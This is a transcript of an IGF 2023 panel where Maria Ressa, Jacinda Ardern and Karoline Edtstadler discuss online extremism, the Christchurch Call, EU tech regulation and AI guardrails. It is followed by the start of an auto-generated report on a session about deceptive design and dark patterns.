And that’s where we’ll go. For the men, I hope you find this as inclusive. Part of the reason I started this way is because the attacks against women online are literally off the scale. When I talk to reporters who are, in some instances, covering male leaders who are misogynist, their editors tell them, you know, buckle up. It’s not our problem. But I think one of the things that we want to lay out is that it is a problem of the technology, it is an incitement of the technology, and it is knocking women’s voices out of the public debate. Let me bring it back to what exactly we’re talking about, the technology that is shaping our world today. And one of the most interesting things Jacinda Ardern did was a very strong reaction to the live streaming of a terrorist attack. It was the first time that a government literally took, asked all news organizations around the world to take out the name of the attacker. So this was, I was surprised when we got this. But when we thought about it, I was like, oh, well, that kind of makes sense. But also to try to deal with taking down this footage from all around the world. Jacinda, you’ve pointed to the Christchurch Initiative as a multi-stakeholder solution for eliminating terrorist and extremist content online. What did it succeed in doing, and where can you see that moving forward, given the landscape we’re working in today?

Jacinda Ardern:
Thank you. A really big question, but I hope that there are some useful lessons to be learned. Where we’ve succeeded, where we have more work to do. So I assume that a number of people in the room will have a bit of prior knowledge about the Christchurch Call to Action, which is over 150 now strong with member organizations made up of, and supporters made up of the likes of government, civil society, and technology membership and platforms. But taking a step back, why did we create this grouping in the first place? Well, as you say, on the 15th of March in 2019, we experienced a horrific domestic terror attack against our Muslim community. It was live streamed on Facebook for a total of 17 minutes, and then subsequently uploaded a number of times over the following days. It was just prolific. People were encountering it without seeking it. And you’re right to acknowledge that in some cases, it was in people’s feeds. Because it was being reposted by news outlets or referenced by news outlets. Now in the aftermath of that, of course, New Zealanders had a very strong reaction. This should never have been able to happen. But now that it’s happened to us, what can we do to try and prevent it happening again? And we took an approach that was not just about how do we address the fact that live streaming itself became a platform for this horrific attack? Because if we just focused on that, that’s a relatively narrow brief. And we know that the tools that are used for violent extremism or by a violent extremist or terrorist online, they’re going to change. Live streaming was a tool at that time. The response was ill-coordinated by other tech platforms for a number of reasons. So work needed to be done there, yes, but we also wanted to make sure that we were ready and fit for purpose should other new forms of technology be the order of the day for those violent extremists. So the Christchurch Call to Action has a number of objectives. Some of them are things like creating a crisis response model so that we are able to stand up quickly should anything like this occur again. And we have not seen at the scale and magnitude of Christchurch online since then. And that’s in part because we now have this almost civil defense model. But we also said, how does someone become radicalized in the first place, acknowledging that in our case, the terrorists involved acknowledge themselves that they believe themselves for being radicalized by YouTube. Now, you know, people will debate whether or not they believe that to be the case. But regardless, there were questions there to be asked around what we can do as governments within our own societies, but also to better understand these pathways. You know, what is curated? How is curated content and algorithmic outcomes driving particular behavior online? So we’ve got a large piece of work now looking at understanding that better. And these, I think, are areas where our learnings will be hugely beneficial much more broadly.

Maria Ressa:
That’s fantastic. Let me follow up with that, which is, you know, last week or I guess a week and a half or so ago. I taught a class with Hillary Clinton and the Dean of SIPA, Karen Yari Milo, where we looked at the radicalism that comes with the virulent ideology of terrorism, right? How that radicalizes people. But one of the things we did in the class was to show how similar it is with what we are going through now on a larger scale with political extremism. Are there any lessons from the Christchurch approach and the pillars that you’ve created, how to deal with radicalization, for example, that we can learn to combat the polarization we’re dealing with globally?

Jacinda Ardern:
Good question. And where I come at it from is our starting point was, how did this individual become so radicalized that they were driven to fly to our country, embed themselves in a community, and then plan an attack against our Muslim community and take 51 lives? How is it that that can happen and what can we do to prevent it? And now the learnings from that may be applicable across a range of different areas and a range of different sources of motivation and rationales, whatever they may happen to be presented by the individual. One common denominator that we determined was that, despite the ideology that might be driving the behavior, was that we couldn’t actually answer some of these questions because so often there would be this issue around, well, privacy, intellectual property. It was very hard to get an insight into how, for instance, algorithms might be driving some of this behavior. If indeed it is. And so we took a step back and over time pulled together a group of individuals, as in governments and platforms, who were willing to put funding into creating a privacy-enhancing tool, which will enable researchers to look at the data that we need to look at in order to understand these pathways, and that will enable researchers across a range of fields to better understand that user journey and that curated content, help understand what successful off-ramps look like, and I hope further prevent this kind of radicalization online.

Maria Ressa:
No, that’s a perfect example. And Caroline, you were in the EU, the EU has been ahead, and data being one of the key factors for how we’re able to see the patterns and trends that influence behavior. Could you tell us about the EU’s approach to its democracy action plan, and then now rolling out the Digital Services Act and the Digital Markets Act?

Karoline Edtstadler:
Well, I think at times like this we should do everything in parallel, and there are so many crises and so many challenges we should find an answer for that it is really quite hard to do so. But I really think that the European Union is regarding the AI Act ahead, and if I’m saying ahead, I mean we are of course lacking back, because we should have been quicker. But the developments were so quick in the last two years, I would say, that it is no more like that. So now we are really trying to do something regarding the AI to have a framework for AI to have a classification of the risks of AI, and I think that is something very important. To classify the risks, because there are some applications, they do not harm us. We need them, I don’t know, for some spam filters, it’s not doing a risk, but on the other hand we have AI which is really harming the whole of our society. And this is the one thing. The other thing is that we already have the DSA and the DMA in the European Union, and I can proudly say that we in Austria were pushing that a lot, and we already started a process in 2020 to have a legal framework in Austria. And it was, I would say, now I put it diplomatically, I had a lot of discussions also with the European level, because they were not happy that we wanted to have an Austrian legal framework for that. But they knew that it will last for at least two years to create it in the European Union, and we were really quick in Austria, we had the Communications Platform Act set into place from the 1st of January 2021, and this is something where the social media platforms have to deal with that issue. They have to do reports, they have to set up, they had to set up a system where someone who has hatred in the internet can push a button and say, this is against me, do something, delete it now, because it’s going around the world very quickly, and you as a victim should be helped in the minute it comes across. So now we have the DSA and the DMA, and of course we have to reveal our legislation, but this was also my goal, to have first the national level, then the European, and now I’m here as a member of the leadership panel, and really try to create something for the universe. So this is for the whole international community, and this is something which is not easy, because of course different governments coming from different standpoints have different assessments of the situation, but in general it’s about human beings treating and have the need to treat this big thing of danger also for our whole society, as Jacinda also said, and as we saw in her country with this really horrifying attack, terrorist attack.

Maria Ressa:
No, that’s from the data from the Philippines that we’ve looked at and analysed in the Nobel Lecture in 2021, I called social media, the tech companies, behaviour modification systems, and I will tweet the data that shows that, as well as the impact we saw in our society. So let me ask our two leaders, you know, for social media, the first time that machine learning and artificial intelligence was really allowed to insidiously manipulate humanity at scale, you’re talking about at that point maybe 3.2 billion, right, deployed at scale across platforms, because it doesn’t just stay in one, there was a lot of public debate and a lot of lobbying money that was focused around downstream solutions, right, the way I think about it is, you know, there’s a factory of lies, I mean, you would have seen this already that is spewing lies into our information ecosystem, the river, and what we tend to focus on in the public is content moderation. Content moderation is like taking a glass of water from the river, cleaning it up, and then dumping it back into the river. So, you know, how can we move away from these downstream solutions like content moderation more into structural problems like design? The fact that MIT in 2018 said lies spread six times faster on these technology platforms than really boring facts. So that design allowed surveillance for profit, right, a business model that we didn’t name until Shoshana Zuboff wrote a book called Surveillance Capitalism in 2019. That just meant that we were retrofitting, we were reacting to the problems after they materialized. Now that we’re in the age of generative AI, I wonder how we can avoid being reactive. Why should the harm come first before we protect the people here? I know it’s a tough question to throw at you, but let me give you an example, for example, of like the pharmaceutical industry. There was a COVID vaccine that we were all looking for, like imagine if the COVID, the pharmaceutical companies didn’t have to first test it, that they could test it in public. So this group A, I’m going to give you vaccine A, and this group here, I’m going to give you vaccine B. Oh, group A, I’m so sorry, you died. I only say that because it is exactly what happened in Myanmar, for example, where both the UN and MEDA sent teams to study genocide in Myanmar. So can we do anything to find, to prevent these types of harms happening? And Caroline first or Jacinda? Caroline.

Karoline Edtstadler:
Well, I would say the first thing is to raise the awareness, to take it as it is, to raise the awareness and to allow people. education and give them skills to deal with that. The second thing, and this is what we are trying to do, we are doing that also in the leadership panel, is to set some legal framework in place. And I would say it should be a regulation that is not hindering innovation, because we know that the developments are quick, they are needed, and they can be used for the best of us. But we have to learn to handle them and also to handle the downsides. And now it’s said like very easily put some legal framework in place, but it’s not so easy because I’m sure that we will lag behind also in the future. And I sometimes compare that with my former profession as a criminal judge. As a criminal judge you’re sitting at the courtroom, but you never have all the information the perpetrator has. And you are always behind, but you in the end have to deal with it and you can deal with that. And I think that’s the same approach we have to use in the regard of new technologies of AI and all the things coming along. And we already proved that it is possible to do so with the DSA and the DMA and before with the legal framework we put in place in Austria. Because, maybe two more sentences to that, when I started the process in 2020 and when I invited to social media platforms to get into a dialogue with me about hatred in the Internet and what we can do against it and that we want to put up a legal framework from the parliamentarian side. Because we as democracies are represented by the parliamentarians and we are ruled by governments. They said, oh no you don’t have to do that because we are so good in handling the hatred in the Internet. We are deleting all the hate postings and so on. We don’t need a legal framework from the national state or from, I don’t know, the EU. And now we have it. And now I think almost all of them are quite okay with them. Let’s put it like that. And we are now in a process also here in Tokyo, we were in Addis Abeba, getting into an exchange, exchanging our experiences and also the expectations of society and this is a good development.

Maria Ressa:
Fantastic. Jacinda, your thoughts? Upstream solutions for generative AI.

Jacinda Ardern:
And look here, I think that that sentiment that you shared in instigating this part of the conversation around how do we put in place guardrails before the fact. This has to be, I think, one of our key take homes over the last, you know, ten years or more. And I think we’re naturally seeing, I think, a hesitancy or a scepticism in the public as a result of the fact that we’ve been retrofitting solutions to try and prevent harms after the fact. Pew released some research, I believe it was recently, demonstrating that roughly half of people were quite negative about the relative benefits of AI and those who know more are even more negative. Now I’m glad that will be because we are talking so much about the potential harms and there isn’t that same emphasis on the opportunities that exist. But I also think it speaks to the experience in recent times of the public and the fact that this is, you know, it’s relatively rare to have a field of work where just because you can, you do. As in we have the ability to develop this tech and so we push ahead even though there are those who are flagging risks and flagging harm. What I’m, I’m an optimist though and I think what I find really encouraging is that we are having these open conversations around the concerns that exist and included in those conversations are those who are at the forefront of the tech itself. And this is where I come back to the fact that I as a past regulator, I am not in the best position to tell you precisely the prescription for those guardrails. But I can tell you in my experience the best methodology to developing them. And that in my mind will always be in this fast paced environment, not to solely take a regulatory approach, although it’s an incredibly important part of the mix, but because of the rapid pace in which we see these technologies developed. And that the multiple, I think, intersections and perspectives we need at the table, that a multi stakeholder approach that includes companies, government and civil society is incredibly important. And, you know, in my mind, that is even if I can’t give you the prescription, I’m absolutely, I absolutely believe that will be the how. One other thing I did not anticipate when we set up the Christchurch call to action and when we convened a group of that nature, was the fact that the companies themselves created a natural tension amongst themselves. Those who are willing to do the least were pulled up by those who are willing to do the most. There was full exposure over, you know, those issues where they might have been up that might have said previously in a one on one, that’s not possible. You got attention there where others were, they knew that it wasn’t possible just to speak to a regulator as though they were unfamiliar with the tech or with the parameters they were operating within, because they’re in a room with those who did understand. And I think that’s particularly important in an area where this is so fast paced, it is highly technical. We need that tension, I think, in the room as well. The final thing I’d say is there are opportunities here. AI may well help us in some areas where we have previously struggled with some of those existing issues that we might might have been spoken to around content moderation, social media, and so on. And naturally, so many of these things just collide in these conversations. And so we should keep looking for those opportunities. But I, for one, always want to take a risk based approach. And I’ll always look for the guardrails.

Maria Ressa:
Fantastic. So I’m going to ask one more question. And then if you have questions, please just go to the microphones. We’re coming up on the last 20 minutes. So this last one, so we’ve tackled the first contact with AI. This we’ve looked at generative AI. And yes, the EU’s doctrine on the AI, there’s lots of doctrines that have been pushed out already. But let’s talk about the use of AI in law enforcement and surveillance. The concerns that have been raised about civil liberties, about privacy, what guardrails can we put in place to protect human rights? And I’m going to toss that first to Jacinda.

Jacinda Ardern:
Yeah, this is this is where we should not be starting from scratch. You know, liberal democracy should pull from the toolkit of human rights, privacy, you know, these these are well established rules and norms. Now, where if indeed there is any nuance in that discussion for any particular area, and often it should be relatively black and white, but if there is any nuance in the discussion, that is where civil society, in my mind, has to be at the table. And again, you know, not to harp on about the importance of the multi stakeholder approach, but let’s let’s first and foremost, not forget that we have well established human rights practices, privacy laws, and we should this should be our fallback position. Any question mark over that then civil society alongside government should be really a good pressure point in those

Maria Ressa:
conversations. And this is where I would encourage civil society to to come up stronger we must because the use of Pegasus and predator, the increasing conflicts all around us. Caroline, the same question to you what guardrails can

Karoline Edtstadler:
we also put? Well, I fully second what Jacinda said. I don’t think that we have to invent the wheels newly. There is already a human rights based order in the world, even if we see, especially since February last year that some are really disobeying everything we concluded to follow. But coming back to the to the internet and technology side, I think we have to guarantee rules based approach in this regard. And I also fully second that AI and all the other technologies can be used and are already used to the best of all of us. Think of the medicines. They are used for operations. They can do it much more precisely than a human person could ever do it. And this helps us of course. And also in the law enforcement you asked. I recently heard a presentation also in Austria before lawyers and barristers and it was also told that in the future of course law firms will use AI in finding the judgments, in structuring the knowledge quicker. But the question is to which point will we go? Will in the end be there a judge, not a judge, but some technology sitting and deciding if someone has to be sent to prison or not? So this is really where we should draw a line. And this is what we are trying within the European Union with the AI Act to structure the risks of AI. And I really do think that this is the way we could guarantee that these technologies are used for the best of all of us. And of course we also have to be clear there is always a downside. But let’s handle these downsides and then it’s better for all of us. Great. Annie,

Maria Ressa:
the mic is open for any questions from the audience. Yes, please. Do I have it? Okay. Say your name and then to whom you want to throw the question. I’m

Audience:
Larry Maggett and I’m the CEO of Connect Safely. And I guess I’m here for some advice because we are writing a parents and educator guide to generative AI. And we’ve got a journalist here, we’ve got a couple of politicians who are really good at talking to the general public. So how would you address parents, educators, people who don’t have a technical knowledge of what GAI is to reassure them that it’s probably not the end of the world, at least initially. But also warn them that there are significant risks and focus a little bit on what they can do within their own families and classrooms to mitigate the risk for those people, for the kids and themselves. Thank you.

Karoline Edtstadler:
Caroline, you want to take it? Well, I think it’s true. The reality is sometimes that children are explaining to parents how to use the phone or they are not doing so and they are simply using their phones and doing things the parents didn’t want them to do with the phones. So I think it’s also something we as governments have to try to put into some legislation or let’s say information campaigns to get the knowledge and the skills to the people. And this is of course a big big challenge because we have to also train elder people because they used these things but there is again always a downside of it. And this is something we can only do together. We had some campaigns also in Austria and some trainings for elder people and we had a lot of discussions also how to train parents. And I don’t have the answer how to do but I think this is the way forward to exchange also our experiences in different countries, what works and how it can work. Great, thank you.

Jacinda Ardern:
This is such a good question. You know I was in the generation that really sat in that really interesting transition point where you know we went from being students who were taught how to use the Dewey Decimal System to find a book in a library and once you’d figured out how to find in a book in a library you had found your fact and your resource. To then being in a period where we were of course inundated with the ability to seek information at our fingertips but we weren’t really taught I think as successfully that what we then found on that shelf might not necessarily be the fact that we thought we were finding before. And the way that my, I had a history teacher who was extremely influential for me growing up who described it as going from a hose to a fire hydrant for kids. So regardless of the particular tech at any given time, be it generative AI or whatever else we may encounter in the future, I would hope that we teach our kids to be curious. Not cynical but curious. And now the tools that we have may be giving the impression that we’re going from a fire hydrant back down to a really well refined hose but that water has been derived from a particular source in a particular way and we need to teach kids just to be curious about that. To go back not just from the information in front of you but think a couple of layers back and think critically in a couple of layers back. So I would sum it up with just curiosity in everything. I think that is going to help us with this, with the age of disinformation, with the rapid technological change and I hope create a generation that is not cynical as a

Audience:
result. Fantastic. Hi, good morning. My name is Michael. I’m the Executive Director of the Forum on Information and Democracy. It’s very intimidating to be in front of greatness but I’ll try to ask a good question. One of the themes I’ve heard today and yesterday in fact was the importance of a multi-stakeholder approach to finding solutions and my question is specifically around the participation of civil society. It’s very easy for governments to show up. It’s very easy for companies to show up, particularly in an environment where pay to play is so pervasive. Where you pay a few hundred thousand dollars, your CEO can show up and speak at an event. You can host a session in a panel. You can capture the narrative. It’s not so easy for civil society. You can’t just buy a business class ticket and get on a plane the next day and show up in an event. So if we’re going to really advance a multi-stakeholder approach, what are some solutions to ensure civil society, especially those from the Global South, can participate effectively? I like the Global South. Let’s, yeah. Well I can only

Karoline Edtstadler:
say we try really to include civil society and I think also the understanding is there that we can tackle these problems and issues only together. Not the government alone, not the parliamentarians alone, not the civil society, not the tech enterprises, but only we as a civil society together and I really mean all of us including the government. And we are doing that in Austria also. I give you an example for the implementation of the SDGs. I will go back on Wednesday and we’ll have the third dialogue forum on SDGs where we really invite also the civil society to contribute, to tell us what they are doing and this is the same here. You can’t do it bottom down. You can only do

Jacinda Ardern:
really good person to speak to this yourself, so maybe you should have a punt at the question. My very brief contribution would be that Michael, I totally agree with you. Early on in the call, you know, most of my interactions were, you know, with civil society at the table because that was what we were building. wanted to be a structure where civil society were at the table. As you say, there are some real practical things to overcome in creating a network of that nature. There are, and they may well be in the room, I can’t see the room, but if anyone from our Christchurch call network is there, I’d ask them to give a quick raise of their hand and just to share at some point, whenever it’s appropriate, their experience. We certainly have learned as we’ve gone over the last four years around how we can make it easier at a practical level and meaningful, that engagement. But the fact we are still going, and I think it is still seen as a valuable network, I hope means we’re doing some things right, but also learning as we go because we’re not perfect. But I’d hand back to you, dear moderator.

Maria Ressa:
Thanks, Jacinda. I mean, Michael, you know there are these times when civil society comes together. We have coming up the Paris Peace Forum coming in. Over the last few years, that’s been one way that we’ve been able to get civil society together, but frankly, not enough, I think. And there are many different groups, like Talin in Estonia has just handed over the Open Government Partnership to Kenya, right? We are, there are all these different groups that are working together, partly some on past problems that could evolve to take on the, you know, I’m a journalist, so information is power, and that is, to me, the top problem. If we do not solve the corruption of the information ecosystem, we cannot solve anything, let alone climate change, right? Let me throw, let’s take three questions, and then our leaders can answer. Please.

Audience:
Good morning, Svetlana Zenz, Article 19. I work in the program which actually engages civil society talking to tech sector. My main countries are China, Vietnam, and Myanmar. Yeah. So the question is the following. I mean, all the European initiatives regarding controlling and, let’s say, monitoring the private sector, especially ICT sector, working in European territories are great. And of course, it’s a human rights centric. I mean, some of the CSOs in Europe might not agree with me, but in comparison with Myanmar, for instance, they’re very good points to follow. So my question is that all the private sector which is regulated in Europe, especially with the Digital Act or Digital EA Act, how would you monitor their actions in the countries with the territory and regimes? Great. Go ahead, please. Hi, yeah, I’m Viet Vu from the DAIS in Toronto Metropolitan University. Maria, we had you in March at our Democracy Exchange and on Democracy in Power, and so it’s related to that. How do you square the fact that much of the people most susceptible to misinformation and disinformation are the kind of people who lack fundamental trust in structures and institutions? I’m sure there are strange conspiracies about what we’re doing in this room today. How do you reach those people? Great, lack trust. And we’ll take one more. Yes, and I think, I hope it’s not too big of a question, but we are being told as humanity that privacy and safety cannot coexist in the online world. We are being told that because the technology is the way it is and because we are faced with design choices that currently exist, privacy cannot be absolute if there is any consideration of safety and safety cannot be guaranteed to anybody because we have to really care about privacy. My question to you is, how can we take a step back and think about human rights and start from there and then think about design choices instead of ending up, to be honest, in very stupid debates about little technology choices, little technology bits and pieces that we need to be working on to overcome challenges and get to the place where we can have both? We really need your help as thought leaders, so any thoughts about that would be really welcome.

Maria Ressa:
Fantastic. Let me toss it, Jacinda, you first, Caroline, and then I’ll pick up some of the questions too.

Jacinda Ardern:
Yeah, I’ll try through, maybe through the last two. I’ll leave the first one to others. Just starting on that last one around the safety debate and the privacy debate. I shared very briefly one experience we had with that, but it persisted for years because as I said with the Christchurch poll, for instance, we didn’t want to just look at downstream, we wanted to go upstream. We wanted to look at those things that may be contributing to radicalization. Algorithm outcomes kept coming up, privacy then kept coming up. Well, we’ve then demonstrated with the establishment of this tool that you can overcome that debate. It did take some resource to establish this tool, but the Christchurch Call Initiative on Algorithmic Outcomes, which now has researchers who are now in real time accessing what previously we were told was information for privacy reasons we would not be able to get to. Now, the next step for us will be demonstrating that that research can prove valuable and then saying to the social media companies, well, this is what we’re learning now, what are we going to do about it? So there, I think, will be the critical next step. But the learning for me there is there are ways. It took too long, though. That was four years that it took us to really overcome that issue. But I hope that that gives some encouragement that we are pushing past it. And sometimes that creative tension I talked about in the room with other tech companies is really helpful for those debates. The second issue that, you know, right hitting the nail on the head, what do we do about those who are susceptible to disinformation? You know, we’ve seen what it can do to liberal democracies when that is writ large. We’ve had some very recent examples in a number of countries, and it is devastating. Here I track back again. Now, there are those who are doing research on this, I believe, and particularly the likes of Columbia, which are tracking back to look at what are the common themes that we’re seeing in those who are most susceptible. But instincts will probably tell us quite a lot as well. And if you’ve got an inherent distrust of the state, probably at some point the state’s failed you in some form. Now, that’s a generalization. But if there’s a general view that your economic position in life is influenced by the state, and you’re in a lower socioeconomic category, and you’re disenfranchised, or you’ve had an experience with the state, for instance, where at some point you’ve been in their care, these are some of the features that we see, and of course, educational attainment as well. Now, we need to track back then as governments think about what we can do to reestablish that trust in institutions. And it means by actually delivering for our people as they expect us to. It’s as simple as that. When it comes down to the one-on-one, I’ve tried to have conversations with people who are deep in conspiracy, and it is an incredibly demoralizing experience. That’s why I always go back to the beginning. How do we stop people falling in in the first place?

Karoline Edtstadler:
Caroline. Well, I would like to start with the second question, because I think that’s the main question for us as politicians. How can we gain trust again in institutions, in governments, in democracy as such? I would say this is also the most difficult question to be answered. We are living in challenging times. This was mentioned already several times, and people are tired of crisis, and they want to believe easy solutions. And this is really our problem, but democracy is a hard work every day, and we have to fight for the trust of the people on a daily basis. So this is the only thing we can do, and we all have to be aware of the fact that you normally cannot find a solution which is beloved by everyone. So there will always be a certain amount of people, a group or something like that, you can name it, who is not happy with the decision. But democracy means that we find majorities, and this is something which was clear in the past, and now it’s not so clear. And one of the reasons is that, and this is also going to the first question, that you can find misinformation, disinformation in the internet, that you find your group only echoing your opinion. And this is really something we found out, especially during the COVID pandemic, that is nearly impossible to get people out of such chambers if they are in these, yeah, in their opinions and surrounded by people who have the same opinion. So what we try to do is to regulate things in Europe, and we would like to be a role model also for the world. That’s why I’m very happy that I’m part of the leadership panel and that I can contribute also from my experiences in Austria, but also at the European level. And again, we are not at the end at this story. And regarding this third point, privacy versus safety, I think we need both of them. And it’s always a challenge, and it has always been a challenge to guarantee human rights. You always have the situation that the human right of the one person ends where the human right of the other person is infringed. And this is something we have to do on a daily base, and what I did as a criminal judge in the courtroom on a daily base. If someone wants to demonstrate, he can, of course, do that. But this right ends when the body of, I don’t know, another person or a policeman is injured. And also here, you have to find the balance, and this is what we have to do. So I would not be that pessimistic than the person, I think it was a woman, who put the question to me that we can do both. We have to do both.

Maria Ressa:
Jacinda has a hard stop at the top of the hour. So let me quickly answer, and then I wanna ask Jacinda for her last thoughts before we let you go, Jacinda. So the quick answer, the first question, the weakness of institutions in the global south, and the countries that you mentioned are the countries where we have seen the regression of democracy, right? And yes, in countries with authoritarian leaders, most of the time, they are using this technology to retain and to gain more power. How do we deal with that? We can talk about that more after the panel. The second one, the cognitive bias that you mentioned, it is there, but frankly, smart people think that they’re immune from the behavior modification aspects of information warfare or information operations. We are all susceptible, and sometimes, the smarter you are, the harder you fall, right? This is a problem. I think it’s a problem for leaders. It is a problem for our shared reality. This is the reason why I have spoken out a lot more about the dangers, because without a shared reality, we cannot do anything together. Finally, the last one, oh my God, I love your question, because privacy by design, trust and safety by design, when the tech companies say that they cannot, it just means they won’t, because there is no regulation, no law, no civil society pressure to demand it. We deserve better. Let me throw it back to Jacinda Ardern for her closing thoughts.

Jacinda Ardern:
Oh, look, I think that you’ve traversed a set of issues that are confronting, I think, all of us in different ways and cut across a range of other incredibly serious and important issues. How do you tackle climate change unless you have a shared reality around the problem definition? The degree to which we see information integrity issues playing out in geo-strategic issues, the fact that they’re coupled with what would be considered traditional forms of warfare. There is a poly-crisis, and at every level of that poly-crisis, we see this extra layer of the challenges presented by technological developments that we’ve seen in recent times. But I’m an optimist, and I’m an optimist because in the worst of times, I’ve been exposed to the ability of humans to design solutions and rapidly adapt and implement solutions, ultimately, for the most part, to protect humanity. And we have that within our capability. We need to empower those who are specifically focused on doing that, who are dedicating themselves to it, often at great sacrifice. We need to support regulators who are focused on doing that, and we need to continue to just rally one another in what is an incredibly difficult space. So my final note to those in the room who are working in these areas, I acknowledge you and the work you do. It is incredibly tough going, but you are in the right place at the right time, and your grandchildren will thank you for it.

Maria Ressa:
Thank you. Thank you, Jacinda Ardern. Caroline, your thoughts?

Karoline Edtstadler:
Well, I can only second what Jacinda said. Your grandchildren will thank you one day because it’s the time now to create the future, and these challenging and crucial times need all of us. And I’m coming back to what I already said. We cannot do it alone as governments. We cannot leave it to the tech enterprises. We cannot do it as politicians, no matter where you serve. We need all of us. We need to change society, to be aware of the challenges ahead, and stay optimistic. I really would like to conclude by stay optimistic. I think thinking back and learning from history, normally it took about 100 years to get used to a new technology. And we are talking about the internet, and we have got father of the internet. We serve as our chair in the leadership panel, and he invented the internet about 50 years ago. So we are halfway. It’s the right time to set the legislation for the internet. It’s the right time to be aware for the children, the parents, the grandparents, how to and what to do with the internet and all these applications we already use in our daily life, and see the positive things, how we changed our life to the positive, since we have all these technologies included in our daily life. So this is really what I try to do. I’m really proud that I have the opportunity to contribute at that level, but that doesn’t mean that it is more important than other levels. The contrary is the case. Everyone is needed in this process, and we can only do it together.

Maria Ressa:
Fantastic, and the last thing I would say is everyone in this room, you are here for the Internet Governance Forum. It is a pivotal moment, and they are so wonderfully optimistic. I’m probably a little more pessimistic, but it depends on what you do, right? It comes down to all of us, and I hate to say it that way, but it is this moment in time. Thank you so much, Right Honorable Jacinda Ardern, Minister Extatler. You guys in the room. We move to the main session. Thank you for coming, and let’s move.

Audience

Speech speed

192 words per minute

Speech length

783 words

Speech time

244 secs

Jacinda Ardern

Speech speed

182 words per minute

Speech length

3161 words

Speech time

1043 secs

Karoline Edtstadler

Speech speed

177 words per minute

Speech length

2948 words

Speech time

999 secs

Maria Ressa

Speech speed

166 words per minute

Speech length

1750 words

Speech time

634 secs

Design Beyond Deception: A Manual for Design Practitioners | IGF 2023 Launch / Award Event #169

Table of contents

Disclaimer: It should be noted that the reporting, analysis and chatbot answers are generated automatically by DiploGPT from the official UN transcripts and, in case of just-in-time reporting, the audiovisual recordings on UN Web TV. The accuracy and completeness of the resources and results can therefore not be guaranteed.

Full session report

Cristiana Santos

The analysis focused on discussions around different aspects of e-commerce, deceptive design, dark patterns, and regulation. One of the speakers, Chandini, conducted research that had a positive influence on regulators, leading to the implementation of easier subscription and unsubscription processes on platforms like Amazon. This highlights the importance of academic research in shaping policies and improving user experience in e-commerce.

Cristiana Santos brought attention to deceptive design practices from a legal standpoint. She discussed how the risk of sanctions can serve as a deterrent for organizations engaging in such practices. Additionally, she emphasized the significance of naming and shaming these practices to create accountability and discourage their use. This legal perspective sheds light on the potential consequences and strategies for tackling deceptive design in the industry.

The analysis also delved into the prevalence of dark patterns, not only within big tech companies but also in smaller, public organizations. Dark patterns refer to manipulative design tactics that make it difficult for users to refuse or withdraw consent. The negative sentiment surrounding dark patterns was evident, as they were found to have harmful effects on users. Studies have shown that dark patterns can cause cognitive harm, result in the loss of control over personal data, evoke negative emotional responses, and create regret over privacy choices. This highlights the need to address and mitigate the adverse impact of dark patterns on individuals’ well-being.

Furthermore, there was a call for better regulation and a shared vocabulary surrounding dark patterns. The speaker, Cristiana Santos, suggested that a shared understanding of dark patterns would greatly benefit user studies, decision mapping, and harm assessments. It is essential for regulatory bodies and scholars to align in their understanding of dark patterns to effectively regulate and combat their negative consequences. This emphasizes the importance of collaboration and knowledge exchange among key stakeholders to address the challenges posed by dark patterns.

In conclusion, this analysis explored important topics related to e-commerce, deceptive design, dark patterns, and regulation. It highlighted the influence of research on policy-making, the legal standpoint on deceptive design practices, the prevalence and harmful effects of dark patterns, and the need for better regulation and a shared vocabulary to address these issues effectively. This comprehensive examination provides valuable insights into the complexities surrounding user experience and the imperative for responsible technological practices in the digital landscape.

Titiksha Vashist

The analysis explores the issue of deceptive design and its negative impact on users and digital ecosystems. One aspect that is discussed is the existence of dark patterns in various online experiences, such as e-commerce apps, social media, and fintech services. These dark patterns are intentionally designed to deceive or manipulate users, ultimately influencing their decision-making. This can lead users to make choices that they would not have made if not for the deceptive design.

Another significant point raised is the harmful consequences of deceptive design on individuals and digital ecosystems as a whole. Deceptive design can result in privacy violations, financial losses, psychological harm, and wasted time and resources. These consequences not only affect individuals but also have broader implications for the integrity and functioning of digital ecosystems.

The analysis also highlights the “Design Beyond Deception” project, which spanned 18 months and involved global expert consultations, workshops, and a research series. The primary goal of this project was to gain a better understanding of how deceptive design impacts contexts that have received less attention in previous research. By shedding light on these understudied areas, the project aims to contribute to the overall understanding of the harmful effects of deceptive design.

Additionally, the analysis underscores the role of regulatory bodies in addressing deceptive design practices. The US Federal Trade Commission and the European Commission have been actively investigating deceptive practices in their respective jurisdictions. This global attention demonstrates the recognition of the need to combat deceptive design and protect users from its negative impact.

In conclusion, the analysis emphasizes that deceptive design has grave consequences and calls for global investigation and action. Its negative effects extend to both individual users and the wider digital ecosystem. Deceptive design distorts fair competition and leads to unfair trade practices. Therefore, it is crucial to address deceptive design in order to safeguard the integrity and well-being of users and digital systems.

Caroline Sinders

Harmful design patterns present a significant challenge on a global scale, particularly within the realm of the modern web. These patterns are characterized by their deceptive and manipulative nature, subverting users’ expectations. They are prevalent universally across various websites and digital platforms.

These harmful design patterns create an unequal web, where users with a design background or knowledge of user experience (UX) design are more equipped to recognize and avoid them. This knowledge gap creates a disparity between users who can navigate the web safely and those who lack this understanding.

Addressing and investigating these harmful design patterns requires a comprehensive understanding of the expected design patterns and where deception or manipulation occurs. This highlights the importance of interdisciplinary research, bringing together policymakers, regulators, and designers. The collaboration of these different areas of expertise can lead to more effective strategies to combat and mitigate the negative effects of these design patterns.

Caroline Sinders, a passionate advocate, emphasizes the need for extensive research that encompasses technical, design, and policy perspectives. Understanding the entire process of product development, including manufacturing and testing, is essential for thorough analysis of the interface. This comprehensive approach strengthens the ability to identify and address deceptive design patterns, ensuring a more user-friendly and trustworthy digital landscape.

In summary, harmful design patterns pose a global issue within the modern web, deceiving and manipulating users and compromising their online experiences. The resulting unequal web underscores the importance of interdisciplinary collaboration to address these patterns. Policymakers, regulators, and designers must work together to develop effective strategies and solutions. Extensive research, incorporating technical, design, and policy perspectives, is necessary to understand and combat deceptive design patterns, ultimately creating a more secure and user-centric digital environment.

Maitreya Shah

Deceptive design practices, particularly in accessibility overlay tools, have detrimental effects on individuals with disabilities. These tools make superficial changes to the user interface, giving the illusion of accessibility without addressing the source code. Consequently, people with disabilities are deceived into perceiving websites as accessible, when in reality, they may still encounter barriers. This not only undermines their ability to navigate and interact with online content but also hinders their equal participation in society.

One concerning aspect is that accessibility overlays can obstruct assistive technologies, which are essential for individuals with disabilities to access and interact with digital content. By impeding these technologies, accessibility overlays violate the privacy and independence of people with disabilities, making it challenging for them to fully engage with online platforms.

